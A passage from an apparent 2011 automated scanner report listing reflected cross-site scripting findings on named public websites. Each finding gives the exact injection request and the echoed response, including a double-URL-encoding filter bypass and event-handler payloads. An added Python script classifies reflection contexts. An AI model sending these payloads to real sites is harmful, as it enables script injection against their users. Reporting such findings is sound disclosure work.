Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/server-statusdfe4c"-alert(1)-"9357ab539ea";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/server-statusdfe4c"-alert
...[SNIP]...

3.27. http://www.collegehumor.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab865'-alert(1)-'8f8e3c9d2a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusab865'-alert(1)-'8f8e3c9d2a5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 03:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 02:59:59 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 03:00:00 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:59:59 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2c82681723835db50248706662f117d04be4f16b; expires=Fri, 01-Apr-2016 08:03:50 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2c82681723835db50248706662f117d04be4f16b; expires=Fri, 01-Apr-2016 08:03:50 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'8f8e3c9d2a5";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/server-statusab865'-alert(1)-'8f8e3c9d2a5';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL3NlcnZlci1zdGF0dXNhYjg2NSctYWxlcnQoMSktJzhmOGUzYzlkMmE1';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...
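
The context labels in the Issue detail paragraphs of 3.10 through 3.27 (attribute value in double or single quotes, unquoted attribute value, plain text between tags, text between TITLE tags, HTML comment, JavaScript string in double or single quotes) follow mechanically from where the scanner's marker lands in the response. The Python below is an added example and is not part of the XSS.CX report or of Burp Scanner: given a response body and the marker that was sent in the REST URL segment or in a parameter name, it lists every raw (unencoded) reflection with the label the report would give it. The sample bodies are constructed to mirror the snippets shown above; they are not the live responses, and the marker c4n4ry7e3a1 is invented.

```python
"""Find a scanner canary in an HTML response and name the sink it landed in.

Added example; not code from the XSS.CX/Burp report. Sample bodies are
constructed to mirror the report's snippets; they are not live responses.
"""
from html import unescape


def classify_reflections(body, canary):
    """One context label per raw occurrence of canary in body, in order.
    An empty list means the canary is absent or only present encoded."""
    labels, start = [], 0
    while True:
        idx = body.find(canary, start)
        if idx < 0:
            return labels
        labels.append(_context_at(body[:idx]))
        start = idx + len(canary)


def is_encoded_only(body, canary):
    """True when the canary shows up only after entity decoding: escaped."""
    return canary not in body and canary in unescape(body)


def _context_at(before):
    """Classify the position right after `before`, innermost construct first."""
    low = before.lower()
    c = before.rfind("<!--")            # an open comment swallows tags too
    if c >= 0 and before.find("-->", c) < 0:
        return "HTML comment"
    s = low.rfind("<script")            # inside <script>: JS tokenizer rules
    if s >= 0 and low.find("</script", s) < 0 and before.find(">", s) >= 0:
        q = _open_js_quote(before[before.find(">", s) + 1:])
        return "JavaScript string (%s quotes)" % q if q else "JavaScript code"
    t = low.rfind("<title")
    if t >= 0 and low.find("</title", t) < 0:
        return "text between TITLE tags"
    lt = before.rfind("<")              # a '<' with no '>' yet: inside a tag
    if lt >= 0 and before.find(">", lt) < 0:
        return {'"': "attribute value (double quotes)",
                "'": "attribute value (single quotes)",
                "": "attribute value (unquoted)",
                None: "tag (attribute name)"}[_attr_quote(before[lt:])]
    return "plain text between tags"


def _open_js_quote(js):
    """'double'/'single' for a JS string literal left open at the end of js,
    else None. Honours backslash escapes; comments are not modelled."""
    quote, i = None, 0
    while i < len(js):
        ch = js[i]
        if quote and ch == "\\":
            i += 1                      # skip the escaped character
        elif quote and ch == quote:
            quote = None
        elif not quote and ch in "\"'":
            quote = ch
        i += 1
    return {'"': "double", "'": "single", None: None}[quote]


def _attr_quote(tag):
    """Scan an unterminated start tag; return the quote around the value at
    its end: '"', "'", '' (unquoted value) or None (not inside a value)."""
    quote, in_value, seen = None, False, 0
    for ch in tag:
        if quote:
            if ch == quote:
                quote, in_value = None, False
        elif in_value:
            if seen == 0 and ch in "\"'":
                quote = ch
            elif seen == 0 and not ch.isspace():
                seen = 1
            elif seen and ch.isspace():
                in_value = False
            elif seen:
                seen += 1
        elif ch == "=":
            in_value, seen = True, 0
    return quote if quote else ("" if in_value and seen else None)


CANARY = "c4n4ry7e3a1"                  # invented marker, stands in for Burp's
SAMPLES = {                             # constructed, modelled on the findings
    "3.10 double-quoted attribute":
        '<input name="referrer" type="text" value="/server-status%s" />' % CANARY,
    "3.12 title and h1": "<title>/server-status%s not found</title>\n"
        "<h1>/server-status%s not found</h1>" % (CANARY, CANARY),
    "3.16 HTML comment":
        "<!-- static stylesheet could not be linked (server-info%sindex)-->" % CANARY,
    "3.18 unquoted attribute": "<img src=/log?u=/server-status?%s=1>" % CANARY,
    "3.21 single-quoted onlogin":
        "<fb:login-button onlogin='window.location=\"/%s?v=1\";'>" % CANARY,
    "3.25 JS double-quoted string":
        '<script language="JavaScript">\n  s.pageName = "/server-status%s";\n</script>' % CANARY,
    "3.27 JS single-quoted string":
        "<script>ch.this_url = '/server-status%s';</script>" % CANARY,
}
# A sink that entity-encodes the attack: reflected, but not exploitable.
ESCAPED_PAYLOAD = '"><script>alert(1)</script>'
ESCAPED_BODY = '<input value="/server-status&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" />'


def run_samples():
    return {name: classify_reflections(body, CANARY) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, labels in run_samples().items():
        print("%-32s %s" % (name, labels))
```

Two things the report's one-label-per-finding format hides show up here: a single request can land in several sinks at once (3.12 echoes the path in both the TITLE and an H1, and the scanner files them as two findings), and a marker that is present only after entity decoding is a reflection but not an injection, which is the case to check before raising the confidence above Tentative.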

3.28. http://www.computerhope.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.computerhope.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf5"><a>a925de045d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status76cf5"><a>a925de045d5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.computerhope.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 7664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>404 error</title>
<meta name="robots" content="noindex, nofollow"
...[SNIP]...
<input type="text" name="q" size="15" value="server-status76cf5"><a>a925de045d5" class="bsbar">
...[SNIP]...

3.29. http://www.computerhope.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.computerhope.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52933"><a>cbbebfb569b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?52933"><a>cbbebfb569b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.computerhope.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 7667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>404 error</title>
<meta name="robots" content="noindex, nofollow"
...[SNIP]...
<input type="text" name="q" size="15" value="server-status?52933"><a>cbbebfb569b=1" class="bsbar">
...[SNIP]...

3.30. http://www.csmonitor.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c614"-alert(1)-"ec3729c8b60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status7c614"-alert(1)-"ec3729c8b60 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 02:47:36 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86374
Expires: Sun, 03 Apr 2011 02:47:10 GMT
Date: Sat, 02 Apr 2011 02:47:36 GMT
Content-Length: 21621
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/server-status7c614"-alert(1)-"ec3729c8b60";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.31. http://www.csmonitor.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5788"-alert(1)-"6c2d12cdf84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?a5788"-alert(1)-"6c2d12cdf84=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 02:47:26 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sun, 03 Apr 2011 02:47:26 GMT
Date: Sat, 02 Apr 2011 02:47:26 GMT
Content-Length: 21586
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/server-status?a5788"-alert(1)-"6c2d12cdf84=1";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.32. http://www.dailyjobposts.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyjobposts.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45714%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28fd38a3c43 was submitted in the REST URL parameter 1. This input was echoed as 45714"><script>alert(1)</script>28fd38a3c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status45714%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28fd38a3c43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailyjobposts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:16:17 GMT
ETag: "6108580215792dd1a8e3719affb002dc"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.2
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Runtime: 1272
Content-Length: 8215
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"
...[SNIP]...
<input name="query" id="query" value="server-status45714"><script>alert(1)</script>28fd38a3c43" type="text" class="textfield">
...[SNIP]...

3.33. http://www.diabetes.org/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diabetes.org
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce16"><img%20src%3da%20onerror%3dalert(1)>28e0b469b4e was submitted in the REST URL parameter 1. This input was echoed as 2ce16"><img src=a onerror=alert(1)>28e0b469b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-info2ce16"><img%20src%3da%20onerror%3dalert(1)>28e0b469b4e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diabetes.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 01:56:30 GMT
Set-Cookie: NSC_dnt_901_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Sat, 02-Apr-2011 02:56:30 GMT;path=/;httponly
Content-Length: 70292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="http://main.diabetes.org/site/UserLogin?NEXTURL=http://www.diabetes.org/server-info2ce16"><img src=a onerror=alert(1)>28e0b469b4e&s_AffiliateSecCatId=1&pw_id=3301">
...[SNIP]...

3.34. http://www.diabetes.org/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diabetes.org
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40b4c"><img%20src%3da%20onerror%3dalert(1)>08e86f25cfd was submitted in the REST URL parameter 1. This input was echoed as 40b4c"><img src=a onerror=alert(1)>08e86f25cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-status40b4c"><img%20src%3da%20onerror%3dalert(1)>08e86f25cfd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diabetes.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 02:31:09 GMT
Set-Cookie: NSC_dnt_901_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Sat, 02-Apr-2011 03:31:09 GMT;path=/;httponly
Content-Length: 70296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="http://main.diabetes.org/site/UserLogin?NEXTURL=http://www.diabetes.org/server-status40b4c"><img src=a onerror=alert(1)>08e86f25cfd&s_AffiliateSecCatId=1&pw_id=3301">
...[SNIP]...

3.35. http://www.dipity.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dipity.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f5'-alert(1)-'dafe7939c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status747f5'-alert(1)-'dafe7939c50 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dipity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:08:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: pvc=prev%041301710116%03last%041301710116%03view%041301710116; expires=Thu, 29-Sep-2011 02:08:36 GMT; path=//personal/; domain=.www.dipity.com
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns='http://www.w3.org/1999/xhtml' xmlns:fb='http://www.facebook.com/2008/fbml' ><head><meta http-equ
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2192351-3']);
_gaq.push(['_trackPageview','/server-status747f5'-alert(1)-'dafe7939c50/?_loggedin=0']);
//dipity.analytics.trackPageview('/server-status747f5'-alert(1)-'dafe7939c50/?_loggedin=0');

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; g
...[SNIP]...

3.36. http://www.docstoc.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1632'-alert(1)-'a701da9b2ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusb1632'-alert(1)-'a701da9b2ee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: pages_visited=2; path=/
Set-Cookie: general=showTopIE9=2,1,4/2/2011 7:49:21 PM; domain=docstoc.com; expires=Mon, 02-Apr-2012 02:49:21 GMT; path=/
serverID: web04
Date: Sat, 02 Apr 2011 02:49:20 GMT
Content-Length: 15439


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
sertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2fserver-statusb1632'-alert(1)-'a701da9b2ee';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

3.37. http://www.docstoc.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b7c4'-alert(1)-'ee53a8104d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?6b7c4'-alert(1)-'ee53a8104d7=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: pages_visited=2; path=/
Set-Cookie: general=showTopIE9=2,1,4/2/2011 7:49:02 PM; domain=docstoc.com; expires=Mon, 02-Apr-2012 02:49:02 GMT; path=/
serverID: web02
Date: Sat, 02 Apr 2011 02:49:01 GMT
Content-Length: 15448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
tBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2fserver-status%3f6b7c4'-alert(1)-'ee53a8104d7%3d1';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

3.38. http://www.dorkly.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dorkly.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5af7"-alert(1)-"84052e722a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd5af7"-alert(1)-"84052e722a4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dorkly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:29:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:29:23 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=c185c9d7b2fed08531c7d4dce57f839ea0f2ea34; expires=Fri, 01-Apr-2016 07:33:14 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=c185c9d7b2fed08531c7d4dce57f839ea0f2ea34; expires=Fri, 01-Apr-2016 07:33:14 GMT; path=/; domain=dorkly.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
r","sec":"errorpage"};
       jument.ad_site = "5480.iac.dorkly";
       jument.cookie.domain = "dorkly.com";
       jument.home_url = "http://www.dorkly.com";
       jument.this_url = "http://www.dorkly.com/server-statusd5af7"-alert(1)-"84052e722a4";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.39. http://www.education.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f36e"%3bb89bfbb523a was submitted in the REST URL parameter 1. This input was echoed as 5f36e";b89bfbb523a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /5f36e"%3bb89bfbb523a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 02:56:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=vdhcn75bhq2ir5o4a1i29j7pu3; expires=Sat, 02-Apr-2011 12:56:41 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 02:56:41 GMT; path=/
Content-Length: 140362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
